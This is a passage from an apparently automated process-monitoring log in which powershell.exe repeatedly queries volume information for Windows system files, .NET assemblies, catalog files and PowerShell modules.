    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
